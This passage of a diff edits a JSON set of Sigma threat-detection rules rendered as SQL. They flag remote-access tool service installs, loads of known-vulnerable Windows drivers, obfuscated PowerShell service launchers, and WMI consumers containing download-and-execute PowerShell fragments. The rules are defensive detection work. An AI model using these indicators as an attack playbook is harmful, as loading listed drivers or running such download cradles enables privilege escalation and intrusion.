'0')" - ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" - }, - { - "title": "Anydesk Remote Access Software Service Installation", - "id": "530a6faa-ff3d-4022-b315-50828e77eef5", - "status": "experimental", - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Legitimate usage of the anydesk tool" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" - ], - "filename": "win_system_service_install_anydesk.yml" - }, - { - "title": "Remote Access Tool Services Have Been Installed - System", - "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. 
These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali", - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR 
sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" ], - "filename": "win_system_service_install_remote_access_software.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "New PDQDeploy Service - Server Side", - "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "title": "Vulnerable Driver Load By Name", + "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "status": "experimental", - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "description": "Detects the load of known vulnerable drivers via their names only.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Legitimate use of the tool" + "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\mtcbsv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gameink.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\81.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sense5ext.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gvcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lurker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\enetechio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows8-10-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\corsairllaccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winflash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\paniox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blackbonedrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio.sys' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\dbutildrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\my.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ni.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2cio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\protects.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netproxydriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64\\_w10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsmartconnectdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdryzenmasterdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmix64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nchgbios2x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrsh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lha.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\blacklotus\\_driver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ucorew64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows7-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\otipcibus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows-xp-64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswarpot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdpowerprofiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tgsafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrrapidstartdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lv561av.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asribdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eneio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\80.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iobitunlocker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstrwsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wiseunlo.sys' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hostnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\glckio2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hpportiox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_amd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kevp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmixp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nbiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\full.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtcore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwrwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hw\\_sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bandai.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t8.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adv64drv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsetupdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gametersafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lenovodiagnosticsdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netflt.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\bw.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nodedriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\naldrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winiodrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pciecubed.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpupress.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswvmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tmcomm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmi.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\alsysio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\testbone.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\air\\_system10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcpu.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kbdcap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lctka.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phlashnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndislan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonfltx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\black.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mydrivers.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\openlibsys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vproeventmonitor.sys' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sysinfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv104.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netfilterdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pchunter.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrautochkupddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lgdcatcher.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fairplaykd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_ia64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asromgdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv101.sys' ESCAPE '\\')" ], - "filename": "win_system_service_install_pdqdeploy.yml" + "filename": "driver_load_win_vuln_drivers_names.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - 
"attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", - "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT 
* FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" - ], - "filename": "win_system_hack_smbexec.yml" - }, - { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" - ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" - }, - { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", - "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects creation of WMI event subscription persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled 
Scan', 'UpdatMachine'))" - ], - "filename": "win_system_apt_oilrig_mar18.yml" - }, - { - "title": "Remote Utilities Host Service Install", - "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "status": "experimental", - "description": "Detects Remote Utilities Host service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" + "attack.t1546.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Exclude legitimate (vetted) use of WMI event subscription in your network" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" + "SELECT * FROM logs WHERE EventID IN ('19', '20', '21')" ], - "filename": "win_system_service_install_remote_utilities.yml" + "filename": "sysmon_wmi_event_subscription.yml" }, { - "title": "TacticalRMM Service Installation", - "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "status": "experimental", - "description": "Detects a TacticalRMM service installation. 
